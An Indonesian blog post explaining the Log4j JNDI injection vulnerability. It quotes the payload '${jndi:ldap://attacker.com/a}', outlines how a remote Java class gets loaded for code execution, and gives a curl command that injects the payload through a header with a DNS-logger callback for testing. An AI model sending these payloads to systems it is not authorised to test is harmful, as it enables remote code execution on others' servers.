RAZPiblog Soft RAZPiblog Soft

Apa itu Bug 0Day Log4j ?


Oke temen-temen kali ini aku akan membagikan artikel tentang bug 0day log4j. Walaupun agak telat hehe. soalnya cukup sibuk juga.

Pembuka Apa Itu 0day Log4j

Baru baru ini viral bug yang baru muncul yaitu log4j tak hanya si aplikasi / situs web standard kebawah tapi juga bug ini ramai mengexploitasi perusahaan besar seperti apple, paypal, dll. Zaman sekarang mulai berkembang teknologi makin melaju pesat banyaknya ciptaan teknologi terbaru dan juga bahasa pemrograman banyak memiliki fitur fitur untuk memudahkan developer dalam mengembangkan aplikasi, tetapi tetap yang namanya sistem kita pasti ada celah yang si developer mungkin tidak terpikirkan. Selain perkembangan IT sangat pesat. Orang orang juga semakin rajin belajar tentang IT hingga menemukan beberapa metode exploitasi baru. Bagi para pentester, bug hunter, hacker mencari metode itu sudah pasti dilakukan oleh mereka entah dalam memperkuat sistem ataupun untuk membobol sistem. Para bug hunter Dapat menemukan celah tersebut dengan mencoba/eksperimen men-exploitasi seperti xss, sql, csrf, dsb. Tapi exploitasi semakin berkembang dengan adanya alat-alat yang memudahkan bagi pentester/bug hunter. Ada satu bug terbaru kali ini yaitu 0day log4j yang menggunakan library java sebagai alat untuk exploitasinya: ${jndi:ldap://attacker.com/a} Step Xploit:
  • Data dari Pengguna dikirim ke server (melalui protokol apa pun)
  • Server mencatat data dalam permintaan, yang berisi payload berbahaya: "${jndi:ldap://attacker.com/a}"(di mana attacker.com server yang dikendalikan attacker)
  • "Klog4j" kerentanan dipicu oleh payload ini dan server membuat permintaan untuk attacker.com melalui "Java Naming and Directory Interface" (JNDI)
  • Respons ini berisi jalur ke file kelas Java jarak jauh (mis. http://second-stage.attacker.com/Exploit.class) yang disuntikkan ke dalam proses server
  • Payload yang disuntikkan ini memicu tahap kedua, dan memungkinkan penyerang untuk mengeksekusi kode arbitrer.
Cara identifikasi Kerentanan Pada Server Anda, menggunakan DNS logger seperti ( dnslog.cn ) atau Anda dapat membuat nama domain dan menggunakannya dalam muatan pengujian Anda:
  • curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'

Seberapa Bahaya Bug Ini

Pakar keamanan siber dari CISSReC, Pratama Persadha mengatakan ada kekhawatiran dalam sistem software Log4j. Software Log4j ada bug yang potensi celah keamanan dan bisa diretas atau hacker. Salah satu bahaya dari serangan tersebut adalah membuat peretas dapat mengambil alih kendali sistem secara penuh.

Pasalnya, bug ini bisa dieksploitasi dengan mudah oleh para pihak yang tidak bertanggung jawab, salah satunya seperti peretas (hacker) untuk membobol sebuah server atau aplikasi hanya dengan menggunakan sejumlah kode saja.

See Also :